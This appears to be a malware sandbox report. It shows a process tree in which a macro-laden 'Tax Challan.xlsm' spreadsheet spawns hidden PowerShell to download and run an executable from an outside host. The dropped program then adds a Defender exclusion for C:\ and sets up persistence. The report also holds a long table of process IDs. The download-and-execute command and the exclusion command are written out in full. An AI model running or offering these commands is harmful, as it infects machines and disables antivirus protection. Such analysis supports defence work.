3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
4760	LkAnJ.exe
4760	LkAnJ.exe
3640	images.exe
3640	images.exe
1088	LkAnJ.exe
1088	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
3640	images.exe
3640	images.exe
4832	LkAnJ.exe
4832	LkAnJ.exe
4948	LkAnJ.exe
4948	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
3540	LkAnJ.exe
3540	LkAnJ.exe
3640	images.exe
3640	images.exe
5020	LkAnJ.exe
5020	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
3640	images.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5056	LkAnJ.exe
3640	images.exe
5044	LkAnJ.exe
5044	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
5080	LkAnJ.exe
5080	LkAnJ.exe
3640	images.exe
3640	images.exe
3644	LkAnJ.exe
3644	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4216	LkAnJ.exe
4216	LkAnJ.exe
3640	images.exe
3640	images.exe
4272	LkAnJ.exe
4272	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
4304	LkAnJ.exe
3640	images.exe
3640	images.exe
1908	LkAnJ.exe
1908	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4260	LkAnJ.exe
4260	LkAnJ.exe
3640	images.exe
3640	images.exe
4228	LkAnJ.exe
4228	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
4460	LkAnJ.exe
4460	LkAnJ.exe
3640	images.exe
3640	images.exe
2744	LkAnJ.exe
2744	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
3640	images.exe
492	LkAnJ.exe
492	LkAnJ.exe
3640	images.exe
2044	LkAnJ.exe
2044	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3640	images.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3904	LkAnJ.exe
3640	images.exe
3904	LkAnJ.exe
3640	images.exe
1308	LkAnJ.exe
1308	LkAnJ.exe
3640	images.exe
3640	images.exe
3640	images.exe
3640	images.exe
4636	LkAnJ.exe
4636	LkAnJ.exe
4636	LkAnJ.exe
4636	LkAnJ.exe
3640	images.exe
3640	images.exe
4636	LkAnJ.exe
4636	LkAnJ.exe

Blacklisted process makes network request 1 IoCs

flow	pid	Process
18	3820	powershell.exe

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Tax Challan.xlsm"
1⤵
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:2804
- C:\Windows\SYSTEM32\cmd.exe
  cmd /c powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')
  2⤵
  - Suspicious use of WriteProcessMemory
  - Process spawned unexpected child process
  PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://jurec.mx/doc.exe',$env:Temp+'\LkAnJ.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\LkAnJ.exe')
    3⤵
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    PID:3820
  - - C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
      "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      Suspicious behavior: MapViewOfSection
      Suspicious use of SetThreadContext
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3312
    - - C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        5⤵
        Drops startup file
        
        PID:3832
    - - C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        5⤵
        Adds Run key to start application
        NTFS ADS
        Suspicious use of WriteProcessMemory
        Drops startup file
        Executes dropped EXE
        
        PID:812
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        6⤵
        
        PID:2328
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2328 -s 668
        7⤵
        Program crash
        Suspicious use of AdjustPrivilegeToken
        
        PID:1000
      - C:\ProgramData\images.exe
        
        "C:\ProgramData\images.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:2220
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        7⤵
        Drops startup file
        
        PID:3804
        
        C:\ProgramData\images.exe
        
        "C:\ProgramData\images.exe"
        7⤵
        Loads dropped DLL
        Suspicious use of WriteProcessMemory
        Executes dropped EXE
        Modifies WinLogon
        Suspicious use of SetWindowsHookEx
        
        PID:1836
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        8⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe"
        8⤵
        
        PID:3180
        
        C:\ProgramData\images.exe
        
        "C:\ProgramData\images.exe" 2 1836 137671
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3640
    - - C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 812 135046
        5⤵
        Suspicious use of WriteProcessMemory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1072
      - C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3336
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        7⤵
        Drops startup file
        
        PID:728
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        7⤵
        Executes dropped EXE
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 3880 137921
        7⤵
        Suspicious use of WriteProcessMemory
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:3136
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        8⤵
        Suspicious use of WriteProcessMemory
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:3484
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        9⤵
        Drops startup file
        
        PID:3084
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        9⤵
        Executes dropped EXE
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1872 139625
        9⤵
        Executes dropped EXE
        
        PID:3356
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        10⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4120
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        11⤵
        Drops startup file
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        11⤵
        Executes dropped EXE
        
        PID:4184
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4184 144375
        11⤵
        Executes dropped EXE
        
        PID:4224
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        12⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4400
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        13⤵
        Drops startup file
        
        PID:4428
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        13⤵
        Executes dropped EXE
        
        PID:4440
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4440 151609
        13⤵
        Executes dropped EXE
        
        PID:4480
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        14⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4584
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        15⤵
        Drops startup file
        
        PID:4616
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        15⤵
        Executes dropped EXE
        
        PID:4628
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4628 197484
        15⤵
        Executes dropped EXE
        
        PID:4664
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        16⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4708
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        17⤵
        Drops startup file
        
        PID:4736
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        17⤵
        Executes dropped EXE
        
        PID:4748
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4748 198859
        17⤵
        Executes dropped EXE
        
        PID:4776
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        18⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4820
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        19⤵
        Drops startup file
        
        PID:4848
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        19⤵
        Executes dropped EXE
        
        PID:4860
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4860 200390
        19⤵
        Executes dropped EXE
        
        PID:4888
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        20⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4928
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        21⤵
        Drops startup file
        
        PID:4956
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        21⤵
        Executes dropped EXE
        
        PID:4968
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4968 201843
        21⤵
        Executes dropped EXE
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        22⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:5040
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        23⤵
        Drops startup file
        
        PID:5068
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        23⤵
        Executes dropped EXE
        
        PID:5080
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 5080 203265
        23⤵
        Executes dropped EXE
        
        PID:5108
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        24⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4112
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        25⤵
        Drops startup file
        
        PID:4144
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        25⤵
        Executes dropped EXE
        
        PID:4196
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4196 204671
        25⤵
        Executes dropped EXE
        
        PID:4172
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        26⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4168
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        27⤵
        Drops startup file
        
        PID:4280
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        27⤵
        Executes dropped EXE
        
        PID:4296
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4296 205984
        27⤵
        Executes dropped EXE
        
        PID:4328
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        28⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:1544
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        29⤵
        Drops startup file
        
        PID:3692
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        29⤵
        Executes dropped EXE
        
        PID:2264
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 2264 207453
        29⤵
        Executes dropped EXE
        
        PID:4188
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        30⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4456
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        31⤵
        Drops startup file
        
        PID:4496
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        31⤵
        Executes dropped EXE
        
        PID:4392
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4392 208937
        31⤵
        Executes dropped EXE
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        32⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:2768
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        33⤵
        Drops startup file
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        33⤵
        Executes dropped EXE
        
        PID:632
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 632 210375
        33⤵
        Executes dropped EXE
        
        PID:1008
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        34⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:3380
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        35⤵
        Drops startup file
        
        PID:3576
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        35⤵
        Executes dropped EXE
        
        PID:408
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 408 211781
        35⤵
        Executes dropped EXE
        
        PID:3880
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        36⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:2080
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        37⤵
        Drops startup file
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        37⤵
        Executes dropped EXE
        
        PID:4472
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4472 213281
        37⤵
        Executes dropped EXE
        
        PID:4592
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        38⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4620
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        39⤵
        Drops startup file
        
        PID:4652
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        39⤵
        Executes dropped EXE
        
        PID:1728
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 1728 214703
        39⤵
        Executes dropped EXE
        
        PID:4692
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        40⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4728
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        41⤵
        Drops startup file
        
        PID:4800
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        41⤵
        Executes dropped EXE
        
        PID:4804
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe" 2 4804 216140
        41⤵
        Executes dropped EXE
        
        PID:4808
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        42⤵
        Suspicious behavior: MapViewOfSection
        Suspicious use of SetThreadContext
        Executes dropped EXE
        
        PID:4844
        
        C:\Windows\SysWOW64\notepad.exe
        
        "C:\Windows\system32\notepad.exe"
        43⤵
        Drops startup file
        
        PID:4896
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe"
        43⤵
        Executes dropped EXE
        
        PID:4880
        
        C:\Users\Admin\AppData\Local\Temp\LkAnJ.exe
        
